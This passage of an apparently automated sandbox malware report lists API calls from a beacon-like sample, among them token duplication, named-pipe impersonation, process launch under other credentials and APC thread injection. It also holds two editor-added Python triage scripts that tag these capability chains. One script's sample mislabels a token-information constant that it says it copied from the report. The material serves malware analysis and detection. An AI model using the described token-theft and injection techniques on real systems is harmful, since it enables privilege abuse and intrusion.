                            • Sleep.KERNEL32(000000C8,00000004,00000000), ref: 00DB67A4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Thread32$AddressCreateFirstHandleModuleNextProcSleepSnapshotToolhelp32_malloc
                            • String ID: NtQueueApcThread$ntdll
                            • API String ID: 147937454-1374908105
                            • Opcode ID: cc9833fae7d3854cbad68c726a09c08cce2d0b1d5ca6d1e5fc6aeabfae91eea4
                            • Instruction ID: a022d3b8154c9726d31ef27e7feabc5d63def82f0586663edb8f3dbdc31cb8e8
                            • Opcode Fuzzy Hash: cc9833fae7d3854cbad68c726a09c08cce2d0b1d5ca6d1e5fc6aeabfae91eea4
                            • Instruction Fuzzy Hash: 9C314775900219FFDF10EFA4C845AEEBBB9EB08714F144426F906E6150EB74DA45CBB1
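The API listings above (the named-pipe connect loop with WaitNamedPipeA and SetNamedPipeHandleState, the OpenProcessToken / DuplicateTokenEx / ImpersonateLoggedOnUser chain, the CreateProcessWithTokenW launcher, the Toolhelp thread enumeration that resolves NtQueueApcThread from ntdll, and the HttpOpenRequestA / HttpSendRequestA and select / accept functions) are the evidence a triage analyst works from when confirming beacon capabilities. The script below is an added example written by the editor; it is not part of the Joe Sandbox report and not code from the sample. It parses bullets in the report's own "APIs" format, groups them per function, decodes a few hex arguments using Windows SDK constant values, and flags capability chains. The chain definitions and the constant table are the editor's heuristics derived from the API sets listed above, the sample input is constructed from lines copied from this report, and only argument positions that line up with the documented API signatures are decoded, because the sandbox's argument rendering is not always complete.

```python
"""Parse the 'APIs' listings of this report and flag the capability chains they show.
Added example by the editor, not Joe Sandbox code; chain rules and constants are heuristics."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# One bullet of an 'APIs' listing, in the three shapes the report uses:
#   • WaitNamedPipeA.KERNEL32(?,00002710), ref: 00DB7A01
#   • GetTickCount.KERNEL32 ref: 00DB79BB
#   • Part of subcall function 00DB6638: _malloc.LIBCMT ref: 00DB6657
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)")

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None

@dataclass
class Function:
    calls: List[ApiCall] = field(default_factory=list)

    def api_names(self) -> Set[str]:
        return {c.api for c in self.calls}

    def string_args(self) -> Set[str]:
        # Arguments that are neither '?' nor hex are strings the sandbox resolved (e.g. 'ntdll').
        return {a for c in self.calls for a in c.args
                if a and a != "?" and not re.fullmatch(r"[0-9A-F]+", a)}

def parse_report(text: str) -> List[Function]:
    """Start a new function at each 'APIs' header and attach the bullets that follow it."""
    funcs: List[Function] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            funcs.append(Function())
            continue
        m = CALL_RE.match(line)
        if m and funcs:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
            funcs[-1].calls.append(ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"]))
    return funcs

# Every API in a set must occur in the same function for the chain to fire (editor's heuristics).
CHAINS: Dict[str, Set[str]] = {
    "token-theft-and-impersonation": {"OpenProcessToken", "DuplicateTokenEx", "ImpersonateLoggedOnUser"},
    "run-as-stolen-token": {"CreateProcessWithTokenW"},
    "smb-named-pipe-client": {"CreateFileA", "WaitNamedPipeA", "SetNamedPipeHandleState"},
    "thread-enumeration": {"CreateToolhelp32Snapshot", "Thread32First", "Thread32Next"},
    "http-c2-request": {"HttpOpenRequestA", "HttpSendRequestA"},
    "tcp-listener": {"select", "accept", "ioctlsocket"},
}

# Windows SDK values, keyed by (API, zero-based argument position) as in the documented signature.
CONSTANTS: Dict[tuple, Dict[str, str]] = {
    ("DuplicateTokenEx", 1): {"02000000": "MAXIMUM_ALLOWED"},
    ("DuplicateTokenEx", 3): {"00000002": "SecurityImpersonation", "00000003": "SecurityDelegation"},
    ("DuplicateTokenEx", 4): {"00000001": "TokenPrimary", "00000002": "TokenImpersonation"},
    ("CreateToolhelp32Snapshot", 0): {"00000004": "TH32CS_SNAPTHREAD"},
    ("ioctlsocket", 1): {"8004667E": "FIONBIO"},
    ("WaitNamedPipeA", 1): {"00002710": "nMaxWait=10000 ms"},
}

def classify(func: Function) -> List[str]:
    found = [name for name, need in CHAINS.items() if need <= func.api_names()]
    # Thread enumeration plus a dynamically resolved NtQueueApcThread is the APC injection pattern.
    if "thread-enumeration" in found and "NtQueueApcThread" in func.string_args():
        found.append("apc-injection")
    return sorted(found)

def decode_args(call: ApiCall) -> Dict[int, str]:
    return {i: CONSTANTS[(call.api, i)][a] for i, a in enumerate(call.args)
            if (call.api, i) in CONSTANTS and a in CONSTANTS[(call.api, i)]}

def report(text: str) -> Dict[str, List[str]]:
    """Map the first ref address of each function to the chains it matched; unmatched ones are dropped."""
    out: Dict[str, List[str]] = {}
    for f in parse_report(text):
        caps = classify(f)
        if caps and f.calls:
            out[f.calls[0].ref] = caps
    return out

# Constructed sample: bullets copied from the listings in this report, grouped as the report groups them.
SAMPLE = """\
APIs
• GetTickCount.KERNEL32 ref: 00DB79BB
• CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00100000,00000000), ref: 00DB79DF
• WaitNamedPipeA.KERNEL32(?,00002710), ref: 00DB7A01
• SetNamedPipeHandleState.KERNEL32(?,?,00000000,00000000), ref: 00DB7A58
APIs
• htonl.WS2_32 ref: 00DBE13C
• OpenProcessToken.ADVAPI32(00000000,00000000,00000008), ref: 00DBE19A
• ImpersonateLoggedOnUser.ADVAPI32(00000008), ref: 00DBE1C3
• DuplicateTokenEx.ADVAPI32(00000008,02000000,00000000,00000003,00000001,00DF08A4), ref: 00DBE1E8
APIs
• GetModuleHandleA.KERNEL32(ntdll,NtQueueApcThread,00000000,00000000), ref: 00DB6704
  • Part of subcall function 00DB6638: _malloc.LIBCMT ref: 00DB6657
• CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00DB673A
• Thread32First.KERNEL32(00000000,0000001C), ref: 00DB674F
• Thread32Next.KERNEL32(00000000,0000001C), ref: 00DB678E
APIs
• _memset.LIBCMT ref: 00DB5EFC
"""
```

Running `report(SAMPLE)` yields the named-pipe client, the token chain and the APC injection pattern keyed by each function's first ref address, while the `_memset`-only function produces nothing; `decode_args` on the DuplicateTokenEx bullet shows the duplicated token is requested with MAXIMUM_ALLOWED at SecurityDelegation level as a primary token, which is what makes it usable with CreateProcessWithTokenW later. The rules are deliberately conservative (all APIs of a chain in one function), so they will miss a beacon whose chain is split across subcalls; the `subcall_of` field is kept so a stricter version can fold subcall bullets into the caller.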
                            APIs
                            • _memset.LIBCMT ref: 00DB5EFC
                            • _memset.LIBCMT ref: 00DB5F08
                              • Part of subcall function 00DB6072: _malloc.LIBCMT ref: 00DB60C4
                              • Part of subcall function 00DB6072: _malloc.LIBCMT ref: 00DB60CF
                              • Part of subcall function 00DB6072: _memset.LIBCMT ref: 00DB60DB
                              • Part of subcall function 00DB6072: _memset.LIBCMT ref: 00DB60E6
                              • Part of subcall function 00DB6072: _rand.LIBCMT ref: 00DB6144
                            • __snprintf.LIBCMT ref: 00DB5F59
                            • __snprintf.LIBCMT ref: 00DB5F71
                            • _memset.LIBCMT ref: 00DB5F90
                            • _memset.LIBCMT ref: 00DB5F9B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$__snprintf_malloc$_rand
                            • String ID: %s&%s$?%s
                            • API String ID: 1876596931-1750478248
                            • Opcode ID: b8394719dd5a92acecc9e45d60fa2e69254bb31a621b3eaa4ca2e4536e1a73dd
                            • Instruction ID: d6f9107a863d9bfa78d0a50161de54951e1427ed9216119fb9c2a2a6f630f863
                            • Opcode Fuzzy Hash: b8394719dd5a92acecc9e45d60fa2e69254bb31a621b3eaa4ca2e4536e1a73dd
                            • Instruction Fuzzy Hash: 46217C71500100FBDF15AE11EC42FAB7B69EF95710F244085FD016B297E670EE11CAB5
                            APIs
                            • _memset.LIBCMT ref: 00DB5EFC
                            • _memset.LIBCMT ref: 00DB5F08
                              • Part of subcall function 00DB6072: _malloc.LIBCMT ref: 00DB60C4
                              • Part of subcall function 00DB6072: _malloc.LIBCMT ref: 00DB60CF
                              • Part of subcall function 00DB6072: _memset.LIBCMT ref: 00DB60DB
                              • Part of subcall function 00DB6072: _memset.LIBCMT ref: 00DB60E6
                              • Part of subcall function 00DB6072: _rand.LIBCMT ref: 00DB6144
                            • __snprintf.LIBCMT ref: 00DB5F59
                            • __snprintf.LIBCMT ref: 00DB5F71
                            • _memset.LIBCMT ref: 00DB5F90
                            • _memset.LIBCMT ref: 00DB5F9B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$__snprintf_malloc$_rand
                            • String ID: %s&%s$?%s
                            • API String ID: 1876596931-1750478248
                            • Opcode ID: 85f1f7033f5375ac6f298d3c1cbd3d9a04bc354981ebd5e4a237038a9953ee7c
                            • Instruction ID: d6f9107a863d9bfa78d0a50161de54951e1427ed9216119fb9c2a2a6f630f863
                            • Opcode Fuzzy Hash: 85f1f7033f5375ac6f298d3c1cbd3d9a04bc354981ebd5e4a237038a9953ee7c
                            • Instruction Fuzzy Hash: 46217C71500100FBDF15AE11EC42FAB7B69EF95710F244085FD016B297E670EE11CAB5
                            APIs
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81C2
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81D2
                            • _memset.LIBCMT ref: 00DBC3CE
                              • Part of subcall function 00DBC7BA: _memset.LIBCMT ref: 00DBC8B6
                            • _malloc.LIBCMT ref: 00DBC3E1
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                            • _memset.LIBCMT ref: 00DBC3F3
                              • Part of subcall function 00DBEA37: _malloc.LIBCMT ref: 00DBEA5E
                              • Part of subcall function 00DBEA37: _memset.LIBCMT ref: 00DBEA8C
                            • htonl.WS2_32(00000000), ref: 00DBC424
                            • GetComputerNameExA.KERNEL32(00000006,?,?), ref: 00DBC495
                            • GetComputerNameA.KERNEL32(?,?), ref: 00DBC4C6
                            • GetUserNameA.ADVAPI32(?,?), ref: 00DBC4F7
                              • Part of subcall function 00DB2F1B: WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000), ref: 00DB2F3F
                            • _malloc.LIBCMT ref: 00DBC5CF
                            • _memset.LIBCMT ref: 00DBC661
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc_memset$Name$Computer$AllocateHeapSocketUserhtonl
                            • String ID:
                            • API String ID: 932012179-0
                            • Opcode ID: a280516bcf2bcbc31588620091ca1e63c8c3124e7ee7d4ddb44343df5665b45f
                            • Instruction ID: 4301775c920e298e48b9857651d8d66dfffa4574e2925b81a5194ddd3f771f34
                            • Opcode Fuzzy Hash: a280516bcf2bcbc31588620091ca1e63c8c3124e7ee7d4ddb44343df5665b45f
                            • Instruction Fuzzy Hash: 4D812772914300EAC320EB659C46FEB77ECFF84720F11581EF58697282DA74DA0487B2
                            APIs
                            • htonl.WS2_32 ref: 00DB8767
                            • htons.WS2_32(00000000), ref: 00DB8778
                            • socket.WS2_32(00000002,00000001,00000000), ref: 00DB87B1
                            • closesocket.WS2_32(00000000), ref: 00DB87C0
                            • gethostbyname.WS2_32(00000000), ref: 00DB87DE
                            • htons.WS2_32(?), ref: 00DB880A
                            • ioctlsocket.WS2_32(00000000,8004667E(FIONBIO),?), ref: 00DB881D
                            • connect.WS2_32(00000000,?,00000010), ref: 00DB882E
                            • WSAGetLastError.WS2_32(00000000,?,00000010), ref: 00DB8837
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
                            • String ID:
                            • API String ID: 3339321253-0
                            • Opcode ID: 74113555802c83711b6376bb1dcc34fb945eae4fab666351e9c2289d6092bec3
                            • Instruction ID: 05230b26a30b47591ceb598f4a5ab89aa9adc236c7223a7d1f13a6a07a3f8603
                            • Opcode Fuzzy Hash: 74113555802c83711b6376bb1dcc34fb945eae4fab666351e9c2289d6092bec3
                            • Instruction Fuzzy Hash: 673108B6D00158EBDB20ABE59C85EFEB7ACEF08314F1401A6F945E7241FA348905D779
                            APIs
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81C2
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81D2
                            • _memset.LIBCMT ref: 00DB4BDD
                            • GetStartupInfoA.KERNEL32(?), ref: 00DB4BF5
                              • Part of subcall function 00DB31C8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000400,00DB4ACB,?,00DB48E4,00DB4ACB,?,00000400), ref: 00DB31DE
                              • Part of subcall function 00DB31C8: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00DB4ACB,00DB48E4,?,00DB48E4,00DB4ACB,?,00000400,?,?,?,?,00DB4ACB), ref: 00DB31F7
                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00DB4C5A
                            • GetCurrentDirectoryW.KERNEL32(00000400,?), ref: 00DB4C64
                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000001,00000000,00000000,00000000,00000000,00000000,?,00DB32CF), ref: 00DB4C8F
                            • GetLastError.KERNEL32 ref: 00DB4C9E
                              • Part of subcall function 00DB26E2: _vswprintf_s.LIBCMT ref: 00DB26FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCurrentDirectoryMultiWide_malloc$CreateErrorInfoLastLogonProcessStartupWith_memset_vswprintf_s
                            • String ID: %s as %s\%s: %d
                            • API String ID: 963358868-816037529
                            • Opcode ID: 3338687d53188791e4c145ffb19e238e297102b4ad604cf31be59687cd3ef16c
                            • Instruction ID: a3b4c1fca304884cd97fce5b0d836c5f3b7b681356d920752c3091cc7269ca03
                            • Opcode Fuzzy Hash: 3338687d53188791e4c145ffb19e238e297102b4ad604cf31be59687cd3ef16c
                            • Instruction Fuzzy Hash: E3413471D00209BADF01AFA9DC85EEFBFB9EF89750F10401AF605A6261DB718A10DB71
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: Virtual$ErrorLastProtectQueryabortfwritevfprintf
                            • String ID: @
                            • API String ID: 1616349570-2766056989
                            • Opcode ID: 1b0efd051e5881cbe3a5a53f7e2a4386ccc2b94af93b62ca0e5c5b9780880a0d
                            • Instruction ID: 2f91aa6c44690fe53a7d4d9a4cebfbeb7542b51ecc99335da346757be2dbd23f
                            • Opcode Fuzzy Hash: 1b0efd051e5881cbe3a5a53f7e2a4386ccc2b94af93b62ca0e5c5b9780880a0d
                            • Instruction Fuzzy Hash: 2D415EB59043019FD700EF29D98565AFBE0FF84354F45893EE888973A1D778E844CB9A
                            APIs
                            • _memset.LIBCMT ref: 00DBDF89
                            • _memset.LIBCMT ref: 00DBDF97
                            • _memset.LIBCMT ref: 00DBDFA5
                            • GetTokenInformation.ADVAPI32(?,00000001(TokenUser),?,00001000,?), ref: 00DBDFC2
                            • LookupAccountSidA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00DBDFF1
                            • __snprintf.LIBCMT ref: 00DBE013
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$AccountInformationLookupToken__snprintf
                            • String ID: %s\%s
                            • API String ID: 2009363630-4073750446
                            • Opcode ID: 1de0312eb1a0e60c3ed76667eb5490b93d98f6b5dfee4b72b6ef86c78a0ad65d
                            • Instruction ID: 3c0dc6ac0b462fdb472b5f719a91a976ce1efe9e8c175436d3644a01148023e9
                            • Opcode Fuzzy Hash: 1de0312eb1a0e60c3ed76667eb5490b93d98f6b5dfee4b72b6ef86c78a0ad65d
                            • Instruction Fuzzy Hash: 1F2100B290111DBADB11DA90DC85FEF77BCEF48744F0445BAB616E2101E670EB848B74
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __snprintf$_memset
                            • String ID:
                            • API String ID: 444161222-0
                            • Opcode ID: 2da3511d33a5d9c64791134d8e0135a70be9b0f43036398cb03b1249db1be582
                            • Instruction ID: b16eba3124d1759d63f3478a319e23a87be059dc00a638576bb91bbc98c3c6a3
                            • Opcode Fuzzy Hash: 2da3511d33a5d9c64791134d8e0135a70be9b0f43036398cb03b1249db1be582
                            • Instruction Fuzzy Hash: 2D61C572800129AFDB11EBA4CC85EFE77BDEF05300F1441A5F949A7122E7359E498B75
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: signal
                            • String ID:
                            • API String ID: 1946981877-0
                            • Opcode ID: e5ac87d4f014395d303e68e2d1d9b879cf4345e1fd894e7c545168dfae24a9c2
                            • Instruction ID: b56ee3113ec50b52d2ebb4f8ab71ee7f336b0eefb9bc163dcadcfca50a5a4408
                            • Opcode Fuzzy Hash: e5ac87d4f014395d303e68e2d1d9b879cf4345e1fd894e7c545168dfae24a9c2
                            • Instruction Fuzzy Hash: 153121B01046008AE7206FA6864C32F76D0AB45328F154B6FE9E4EB3D1CBFDC985971B
                            APIs
                            • _memset.LIBCMT ref: 00DB412F
                            • GetLastError.KERNEL32 ref: 00DB4142
                            • ConnectNamedPipe.KERNEL32(00000000), ref: 00DB4156
                            • ReadFile.KERNEL32(?,00000001,?,00000000), ref: 00DB4170
                            • ImpersonateNamedPipeClient.ADVAPI32 ref: 00DB4180
                            • GetCurrentThread.KERNEL32 ref: 00DB4195
                            • OpenThreadToken.ADVAPI32(00000000), ref: 00DB419C
                            • DisconnectNamedPipe.KERNEL32(?), ref: 00DB41B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorFileImpersonateLastOpenReadToken_memset
                            • String ID:
                            • API String ID: 3867162830-0
                            • Opcode ID: 7ac0bb848ff8242492bbf9dfabf66e63852f299c8cd1f5bd47bb61822328bc16
                            • Instruction ID: 4b5303286dd64bd385b8a34699749d68763600282d5cbec9c467a9649f6611cd
                            • Opcode Fuzzy Hash: 7ac0bb848ff8242492bbf9dfabf66e63852f299c8cd1f5bd47bb61822328bc16
                            • Instruction Fuzzy Hash: 9D117031A41359EFDB10AF64ED85AAA3BBCEB14799F044022F606D6263DB30CD449B70
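                            Added triage example (editor's code, not part of the Joe Sandbox report or of the sample): a parser for API listings in the shape shown on this page. It turns each "• Api.MODULE(args), ref: addr" line into a record, keeps "Part of subcall function" lines separate from the function's own calls, re-derives two constants the report leaves raw or mislabels (ioctlsocket 8004667E is FIONBIO; GetTokenInformation class 1 is TokenUser, which is what LookupAccountSidA and the "%s\%s" format string need), and tags a function when a whole capability cluster is present, such as ConnectNamedPipe → ReadFile → ImpersonateNamedPipeClient → OpenThreadToken. The sample inputs are lines copied from this page; the capability rules and constant tables are the editor's, taken from the Windows SDK headers, not from the report.

```python
"""Triage helper for Joe Sandbox-style API listings (added example, not report code)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# Matches "• Api.MODULE(args), ref: ADDR" and "• Part of subcall function ADDR: Api.MODULE ref: ADDR".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Constant names re-derived from raw values (Windows SDK), keyed by API: both
# take the constant as the second argument.
IOCTL_NAMES = {0x8004667E: "FIONBIO"}
TOKEN_INFO_CLASS = {1: "TokenUser", 2: "TokenGroups", 3: "TokenPrivileges",
                    8: "TokenType", 20: "TokenElevation", 25: "TokenIntegrityLevel"}
CONSTANT_TABLES = {"ioctlsocket": IOCTL_NAMES, "GetTokenInformation": TOKEN_INFO_CLASS}

# Capability tag -> (all of these APIs must appear, at least one of these must appear).
RULES: Dict[str, Tuple[Set[str], Set[str]]] = {
    "named-pipe client impersonation": ({"ImpersonateNamedPipeClient", "OpenThreadToken"}, set()),
    "process launch as another user": (set(), {"CreateProcessWithLogonW", "CreateProcessWithTokenW"}),
    "token owner lookup": ({"GetTokenInformation", "LookupAccountSidA"}, set()),
    "host/user fingerprinting": ({"GetUserNameA"}, {"GetComputerNameA", "GetComputerNameExA"}),
    "non-blocking socket connect": ({"connect"}, {"ioctlsocket"}),
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None  # set when the report marks the line as a callee's call


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # section labels ("APIs", "Strings") and non-API lines
        raw = m.group("args")
        # Drop the report's own "(Name)" annotations so the raw value can be decoded.
        args = [] if raw is None else [re.sub(r"\(.*?\)", "", a).strip() for a in raw.split(",")]
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, m.group("ref").upper(), m.group("sub")))
    return calls


def decode_constant(call: ApiCall) -> Optional[str]:
    table = CONSTANT_TABLES.get(call.api)
    if table is None or len(call.args) < 2:
        return None
    try:
        return table.get(int(call.args[1], 16))
    except ValueError:  # "?" means the sandbox could not resolve the argument
        return None


def classify(calls: List[ApiCall]) -> List[str]:
    # Only the function's own calls count; subcall lines describe a callee.
    names = {c.api for c in calls if c.subcall_of is None}
    return [tag for tag, (all_of, any_of) in RULES.items()
            if all_of <= names and (not any_of or any_of & names)]


def triage(text: str) -> Dict[str, object]:
    calls = parse_api_lines(text)
    constants = {}
    for c in calls:
        name = decode_constant(c)
        if name:
            constants[c.ref] = name
    return {"calls": len(calls), "tags": classify(calls), "constants": constants}


# Sample inputs: lines copied from this report's listings.
PIPE_SAMPLE = """\
• _memset.LIBCMT ref: 00DB412F
• GetLastError.KERNEL32 ref: 00DB4142
• ConnectNamedPipe.KERNEL32(00000000), ref: 00DB4156
• ReadFile.KERNEL32(?,00000001,?,00000000), ref: 00DB4170
• ImpersonateNamedPipeClient.ADVAPI32 ref: 00DB4180
• GetCurrentThread.KERNEL32 ref: 00DB4195
• OpenThreadToken.ADVAPI32(00000000), ref: 00DB419C
• DisconnectNamedPipe.KERNEL32(?), ref: 00DB41B0
"""
TOKEN_SAMPLE = """\
• _memset.LIBCMT ref: 00DBDF89
• GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,00001000,?), ref: 00DBDFC2
• LookupAccountSidA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00DBDFF1
• __snprintf.LIBCMT ref: 00DBE013
"""
CONNECT_SAMPLE = """\
• htonl.WS2_32 ref: 00DB8767
• htons.WS2_32(00000000), ref: 00DB8778
• socket.WS2_32(00000002,00000001,00000000), ref: 00DB87B1
• closesocket.WS2_32(00000000), ref: 00DB87C0
• gethostbyname.WS2_32(00000000), ref: 00DB87DE
• htons.WS2_32(?), ref: 00DB880A
• ioctlsocket.WS2_32(00000000,8004667E,?), ref: 00DB881D
• connect.WS2_32(00000000,?,00000010), ref: 00DB882E
• WSAGetLastError.WS2_32(00000000,?,00000010), ref: 00DB8837
  • Part of subcall function 00DB2F1B: WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000), ref: 00DB2F3F
"""

if __name__ == "__main__":
    for name, sample in (("pipe", PIPE_SAMPLE), ("token", TOKEN_SAMPLE), ("connect", CONNECT_SAMPLE)):
        print(name, triage(sample))
```

                            The rules deliberately require the whole cluster: ImpersonateNamedPipeClient alone is common in legitimate RPC servers, but paired with OpenThreadToken in the same function it is the token-capture step that the later CreateProcessWithTokenW consumer relies on. Subcall lines are parsed but excluded from tagging so that a shared helper (for example the WSASocketA wrapper) does not tag every caller.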
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                            • String ID:
                            • API String ID: 3886058894-0
                            • Opcode ID: 73bb71f67bf0becb2f1dd24f7f3995b2945a0b1f834a48f7059707b9a443755c
                            • Instruction ID: d84dfc90c452ef7fae1514e5acde8fc1bd2e5a4dc1c3ac389da0d5ada4145a68
                            • Opcode Fuzzy Hash: 73bb71f67bf0becb2f1dd24f7f3995b2945a0b1f834a48f7059707b9a443755c
                            • Instruction Fuzzy Hash: 17518131900606EBCB209F698858F9EFBB5EF81320F28862DF86597191E7309A51DF71
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                            • String ID:
                            • API String ID: 3886058894-0
                            • Opcode ID: be45696a32e206cab89c2fccae979ac639060203ce16becbc01005babec9e347
                            • Instruction ID: a5bff3958b78e37c8e9b0e4c81c0a9fc464120609c3a741f81e4664672bfb177
                            • Opcode Fuzzy Hash: be45696a32e206cab89c2fccae979ac639060203ce16becbc01005babec9e347
